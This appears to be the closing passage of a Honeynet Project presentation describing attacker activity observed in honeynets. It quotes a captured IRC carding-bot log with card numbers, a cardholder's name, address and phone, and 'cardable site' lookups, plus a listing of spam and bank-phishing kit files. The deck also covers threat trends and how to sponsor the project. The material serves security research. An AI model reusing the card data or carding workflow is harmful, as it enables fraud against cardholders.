    • -rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip
    • -rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz
    • -rw-r--r-- 1 free web 1574 Jul 11 01:08 sendbank1.tgz
    • -rw-r--r-- 1 free web 2238 Jul 18 23:07 sendbankNEW.tgz
    • -rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip
    • -rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip
    • -rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
    • drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
    • -rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz
    • -rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip
  • 91. Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA: !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA: !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
  • 92. The Future
    • Hacking is profitable and difficult to get caught.
    • Expect more attacks to focus on the end user or the client.
    • Expect things to get worse, bad guys adapt faster.
  • 93. Honeynets
  • 94. Issues
    • Require extensive resources to properly maintain.
    • Detection and anti-honeynet technologies have been introduced.
    • Can be used to attack or harm other non-Honeynet systems.
    • Privacy can be a potential issue.
  • 95. Legal Contact for .mil / .gov
    • Department of Justice; Computer Crime and Intellectual Property Section.
      • Paul Ohm
        • Number: (202) 514.1026
        • E-Mail: [email_address]
  • 96. Learning More
  • 97. Our Website
    • Know Your Enemy papers.
    • Scan of the Month Challenges
    • Latest Tools and Technologies
    • http://www.honeynet.org/
  • 98. Our Book http://www.honeynet.org/book
  • 99. Sponsoring YOU? Advanced Network Management Lab
  • 100. How to Sponsor
    • Sponsor development of a new tool
    • Sponsor authorship of a new research paper.
    • Sponsor research and development.
    • Buy our book
    <project@honeynet.org> http://www.honeynet.org/funds/
  • 101. Conclusion
    • The Honeynet Project is a non-profit, research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.
  • 102.
    • http://www.honeynet.org
      • <project@honeynet.org>